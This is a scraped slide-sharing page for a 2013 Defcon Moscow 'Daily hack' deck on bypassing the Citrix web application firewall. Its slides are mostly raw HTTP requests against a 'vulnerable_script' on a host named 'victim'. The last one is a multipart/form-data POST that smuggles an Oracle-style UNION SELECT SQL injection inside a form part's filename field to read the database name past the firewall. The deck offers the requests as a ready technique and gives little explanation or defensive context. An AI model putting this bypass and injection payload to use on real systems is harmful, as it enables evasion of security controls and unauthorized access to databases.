Download to read offline
Uploaded bydefconmoscow
2. [Daily hack] Citrix_waf_bypass
The document discusses techniques for bypassing the Citrix Web Application Firewall (WAF). It includes three examples of HTTP requests targeting a vulnerable script: a GET request, a POST request, and an improved POST request that includes a multipart/form-data encoding and SQL injection payload to retrieve the database name. The document concludes with a link to additional information on Citrix WAF bypass techniques.
More Related Content
![[HackInTheBox] Breaking virtualization by any means](https://cdn.slidesharecdn.com/ss_thumbnails/brossard-hitb-kuala-lumpur-2010-101022053642-phpapp01-thumbnail.jpg?width=640&height=640&fit=bounds)
![[2014/10/06] HITCON Freetalk - App Security on Android](https://cdn.slidesharecdn.com/ss_thumbnails/20141006devcorehitconfreetalkandroid-141007004147-conversion-gate01-thumbnail.jpg?width=640&height=640&fit=bounds)
![[Wroclaw #1] Android Security Workshop](https://cdn.slidesharecdn.com/ss_thumbnails/owaspplwroclaw1-160225150939-thumbnail.jpg?width=640&height=640&fit=bounds)
![7.4. Show impact [bug bounties]](https://cdn.slidesharecdn.com/ss_thumbnails/4-150409135127-conversion-gate01-thumbnail.jpg?width=640&height=640&fit=bounds)
![6. [Bonus] DCM MI6](https://cdn.slidesharecdn.com/ss_thumbnails/bonusdcmmi6-150409134840-conversion-gate01-thumbnail.jpg?width=640&height=640&fit=bounds)
![5.1. Flashback [hacking AD]](https://cdn.slidesharecdn.com/ss_thumbnails/1-150409134641-conversion-gate01-thumbnail.jpg?width=640&height=640&fit=bounds)
![5. [Daily hack] Truecrypt](https://cdn.slidesharecdn.com/ss_thumbnails/dailyhacktruecrypt-150409134639-conversion-gate01-thumbnail.jpg?width=640&height=640&fit=bounds)
![4.5. Contests [extras]](https://cdn.slidesharecdn.com/ss_thumbnails/5-150409134359-conversion-gate01-thumbnail.jpg?width=640&height=640&fit=bounds)
2. [Daily hack] Citrix_waf_bypass
- 1. Daily hack By DCM Jun30, 2013
- 2. /whoami Defcon Moscow Youalready know it about us ??? PROFIT
- 3. Daily hack Citrix WAFBypass GET /vulnerable_script HTTP/1.1 Host: victim User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: ... citrix_ns_id_ ... Connection: keep-alive
- 4. Daily hack POST /vulnerable_scriptHTTP/1.1 Host: victim User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:21.0) Gecko/20100101 Firefox/21.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: ... citrix_ns_id_ ... Connection: keep-alive Content-Length: 462 Citrix WAF Bypass
- 5. Daily hack POST /vulnerable_scriptHTTP/1.1 Host: victim User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:21.0) Gecko/20100101 Firefox/21.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: ... citrix_ns_id_ ... Connection: keep-alive Content-Type: multipart/form-data; boundary=--------2125014176 Content-Length: 462 Citrix WAF Bypass
- 6. Daily hack Citrix WAFBypass ----------2125014176 Content-Disposition: form-data; name="vid" /***/ ----------2125014176 Content-Disposition: form-data; name="vid"; filename="999999' union select 'aaaaa',SYS.DATABASE_NAME,'bbbb',NULL,NULL,NULL,NULL,NULL,NULL,N ULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU LL,NULL,NULL,NULL,NULL,NULL,null,NULL from dual -- " 1 ----------2125014176-- http://bit.ly/1448cRr
- 7.